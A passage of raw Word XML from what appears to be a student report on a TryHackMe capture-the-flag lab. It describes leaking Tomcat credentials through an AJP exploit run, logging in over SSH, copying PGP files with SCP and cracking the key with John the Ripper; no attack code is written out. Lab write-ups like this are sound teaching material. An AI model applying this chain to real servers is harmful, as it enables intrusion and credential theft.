      </w:fldSimple>
      <w:r>
        <w:t>: AJP Shooter Run</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNWMyZmI3M2ItMmY4My00NzU1LTk4MjktZDgwZTY3ZTYwMzQ3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128444893"/>
          <w:placeholder>
            <w:docPart w:val="7397539074E84AFBB931612F0F5475BA"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="409"/>
      <w:bookmarkEnd w:id="410"/>
      <w:bookmarkEnd w:id="411"/>
    </w:p>
    <w:p w14:paraId="4302B7AE" w14:textId="77777777" w:rsidR="003D51D7" w:rsidRPr="003D51D7" w:rsidRDefault="003D51D7" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1653A2" w14:textId="15E55DDB" w:rsidR="00062370" w:rsidRDefault="003D51D7" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the web.xml file has been read it returns the username and password as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00DD46EB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00733D7B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035940FF" w14:textId="789C2D37" w:rsidR="00062370" w:rsidRDefault="006211D4" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006211D4">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A7F9EAE" wp14:editId="3181C982">
            <wp:extent cx="5731510" cy="3226873"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="760259220" name="Picture 7602592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20" name="Picture 760259220" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId119"/>
                    <a:srcRect t="3003"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3226873"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="677B2E59" w14:textId="08658896" w:rsidR="003D51D7" w:rsidRDefault="003D51D7" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="412" w:name="_Toc111363667"/>
      <w:bookmarkStart w:id="413" w:name="_Toc111363804"/>
      <w:bookmarkStart w:id="414" w:name="_Toc111981827"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>102</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: the Username and Password</w:t>
      </w:r>
      <w:r w:rsidRPr="003D51D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is Returned</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMDQyYTEwZDktMTQxNy00ODkyLThmMjItMzFlMjUyMWQ4MjEx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1440570612"/>
          <w:placeholder>
            <w:docPart w:val="87C3013135E148688EF88088F98624CE"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="412"/>
      <w:bookmarkEnd w:id="413"/>
      <w:bookmarkEnd w:id="414"/>
    </w:p>
    <w:p w14:paraId="59F4C4AE" w14:textId="27EE6D33" w:rsidR="00C421FA" w:rsidRDefault="00C421FA" w:rsidP="00716147">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490B4E30" w14:textId="7829F49B" w:rsidR="006211D4" w:rsidRPr="000D1C24" w:rsidRDefault="000D1C24" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="008C12AD">
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t xml:space="preserve"> was run</w:t>
      </w:r>
      <w:r w:rsidRPr="008C12AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> port 22 as ‘open’</w:t>
      </w:r>
      <w:r w:rsidR="008C12AD" w:rsidRPr="008C12AD">
        <w:t>(figure 9</w:t>
      </w:r>
      <w:r w:rsidR="001F0B71">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="008C12AD" w:rsidRPr="008C12AD">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>. Using the username ‘skyfuck’ and the password an SSH connection was established. The files were listed using the ‘ls’ command demonstrated in figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>03</w:t>
      </w:r>
      <w:r>
        <w:t>. The file list includes</w:t>
      </w:r>
      <w:r w:rsidR="006211D4" w:rsidRPr="000D1C24">
        <w:t xml:space="preserve"> ‘credential.pgp’ and ‘tryhackme.asc’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7C04D3" w14:textId="2BF38C4A" w:rsidR="00062370" w:rsidRDefault="006211D4" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006211D4">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="612C2ABB" wp14:editId="2D5188A2">
            <wp:extent cx="5731510" cy="3488690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="760259223" name="Picture 7602592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23" name="Picture 760259223" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId120"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3488690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3959B9C4" w14:textId="463CD9B8" w:rsidR="006211D4" w:rsidRDefault="006211D4" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="415" w:name="_Toc111363668"/>
      <w:bookmarkStart w:id="416" w:name="_Toc111363805"/>
      <w:bookmarkStart w:id="417" w:name="_Toc111981828"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>103</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: SSH into User and List Directory Contents</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fM2Q1NzAyNGUtOTc0MC00N2MwLWIxMjktNzg1OGNlMDNkYWRh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599691360"/>
          <w:placeholder>
            <w:docPart w:val="DC835E879B9F4859AB833F53C7A05C0C"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="415"/>
      <w:bookmarkEnd w:id="416"/>
      <w:bookmarkEnd w:id="417"/>
    </w:p>
    <w:p w14:paraId="345CCF0D" w14:textId="54E91DD1" w:rsidR="006E3779" w:rsidRDefault="006E3779" w:rsidP="000D1C24">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Secure Copy Protocol (SCP) is a protocol like the File Transfer Protocol (FTP) but with added authentication and security. Th</w:t>
      </w:r>
      <w:r w:rsidR="00105612">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">SCP is used to transfer the files as demonstrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F41992">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC37810" w14:textId="1C5EF0B9" w:rsidR="00D91BCB" w:rsidRDefault="00D91BCB" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91BCB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67284FD1" wp14:editId="7516A98F">
            <wp:extent cx="5870104" cy="727788"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="294847917" name="Picture 294847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1"/>
                    <a:srcRect l="868" t="14040" r="18667" b="-832"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6068315" cy="752363"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D384D" w14:textId="53F1A11C" w:rsidR="00105612" w:rsidRDefault="006E3779" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="418" w:name="_Toc111363669"/>
      <w:bookmarkStart w:id="419" w:name="_Toc111363806"/>
      <w:bookmarkStart w:id="420" w:name="_Toc111981829"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>104</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: SCP File</w:t>
      </w:r>
      <w:r w:rsidR="00CE2071">
        <w:t xml:space="preserve"> Transfer</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZTM5YjViM2MtNjNjYy00NTkwLWJiMjYtY2QxNzcxYWIwYjBj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1786543002"/>
          <w:placeholder>
            <w:docPart w:val="29F6BD7097A146A0A8DD8AFBD250346D"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="418"/>
      <w:bookmarkEnd w:id="419"/>
      <w:bookmarkEnd w:id="420"/>
    </w:p>
    <w:p w14:paraId="21A54035" w14:textId="77777777" w:rsidR="00CE2071" w:rsidRPr="00CE2071" w:rsidRDefault="00CE2071" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A56246" w14:textId="7178AFD4" w:rsidR="00DE494E" w:rsidRDefault="00CE2071" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">The file types are illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="008C12AD">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="000930A0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DE494E">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> The command ‘subl’ is used to bring up the text of the corresponding file, which in this case is the pgp private block key,</w:t>
      </w:r>
      <w:r w:rsidR="000930A0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidR="00DE494E">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> illustrated</w:t>
      </w:r>
      <w:r w:rsidR="000930A0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E645B5" w14:textId="422B254F" w:rsidR="00D91BCB" w:rsidRDefault="00FB6DDC" w:rsidP="00B77DD1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6DDC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EF74D59" wp14:editId="35D253B1">
            <wp:extent cx="6786693" cy="3291840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="760259229" name="Picture 76025922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29" name="Picture 760259229" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6808371" cy="3302355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4322AA" w14:textId="5D01F990" w:rsidR="00FB6DDC" w:rsidRDefault="00FB6DDC" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="421" w:name="_Toc111363670"/>
      <w:bookmarkStart w:id="422" w:name="_Toc111363807"/>
      <w:bookmarkStart w:id="423" w:name="_Toc111981830"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>105</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: PGP Private Block Key</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMTQ1MTQ3YjktNTIwYy00Njg0LWJmZGUtYzgyMmFjMDYyY2Iw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598917603"/>
          <w:placeholder>
            <w:docPart w:val="984429ACD67B49A2A8DAF721F44D2A10"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="421"/>
      <w:bookmarkEnd w:id="422"/>
      <w:bookmarkEnd w:id="423"/>
    </w:p>
    <w:p w14:paraId="1076FA59" w14:textId="77777777" w:rsidR="00FB6DDC" w:rsidRPr="00FB6DDC" w:rsidRDefault="00FB6DDC" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABD8BF7" w14:textId="60631B56" w:rsidR="005563EE" w:rsidRPr="005563EE" w:rsidRDefault="00FB6DDC" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="434756"/>
          <w:spacing w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Once the encrypted Private Key Block has been found it can be cracked using the</w:t>
      </w:r>
      <w:r w:rsidR="009D0FD1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> John the Ripper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
      <w:r w:rsidR="005563EE">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005563EE" w:rsidRPr="000930A0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:spacing w:val="-1"/>
